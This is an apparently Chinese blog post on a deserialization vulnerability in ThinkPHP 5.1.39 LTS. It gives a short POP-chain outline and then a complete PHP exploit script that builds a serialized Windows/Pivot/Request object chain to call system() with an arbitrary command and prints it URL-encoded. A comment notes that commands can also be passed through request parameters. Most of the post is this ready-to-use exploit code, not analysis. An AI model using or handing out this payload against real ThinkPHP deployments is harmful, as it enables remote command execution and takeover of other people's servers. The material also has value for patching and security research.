A-A+
Thinkphp v5.1.39 LTS 反序列化漏洞分析 及 EXP(poc)
POP链为:
Windows::__destruct --> Pivot::__toString --> Request::__call -->Request::isAjax --> Request::param --> Request::input --> Request::filterValue -->call_user_func
EXP(POC):
倘若要执行system('id'),则需要控制变量为以下值
Request->filter = "system";
Request->param = array('id');
Request->hook['visible'] = [$this,"isAjax"];
Request->config['var_ajax'] = '';
Pivot->data = ["azhe" => new Request()];
Pivot->append = ["azhe" => ["4ut","15m"]];
Windows->files = [new Pivot()];
---exp---
<?php
namespace think;
abstract class Model{
private $data = [];
protected $append = [];
public function __construct(){
$this->data = ["azhe" => new Request()];
$this->append = ["azhe" => ["4ut","15m"]];
}
}
class Request{
protected $config = [
// 表单请求类型伪装变量
'var_method' => '_method',
// 表单ajax伪装变量
'var_ajax' => '_ajax',
// 表单pjax伪装变量
'var_pjax' => '_pjax',
// PATHINFO变量名 用于兼容模式
'var_pathinfo' => 's',
// 兼容PATH_INFO获取
'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
// 默认全局过滤方法 用逗号分隔多个
'default_filter' => '',
// 域名根,如thinkphp.cn
'url_domain_root' => '',
// HTTPS代理标识
'https_agent_name' => '',
// IP代理获取标识
'http_agent_ip' => 'HTTP_X_REAL_IP',
// URL伪静态后缀
'url_html_suffix' => 'html',
];
protected $param = [];
protected $hook = [];
protected $filter;
public function __construct(){
$this->filter = "system";
$this->hook = ["visible" => [$this, "isAjax"]];
$this->param = array('id'); //可以在这里写定命令,也可不在此设定,param函数会通过提交的参数来更新该值,故也可直接在地址栏提交任意参数执行命令
$this->config['var_ajax'] = '';
}
}
namespace think\process\pipes;
use think\Model\Pivot;
class Windows{
private $files ;
public function __construct(){
$this->files = [new Pivot()];
}
}
namespace think\model;
use think\Model;
class Pivot extends Model{
}
use think\process\pipes\Windows;
echo urlencode(serialize(new Windows()))."\n";
?>
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏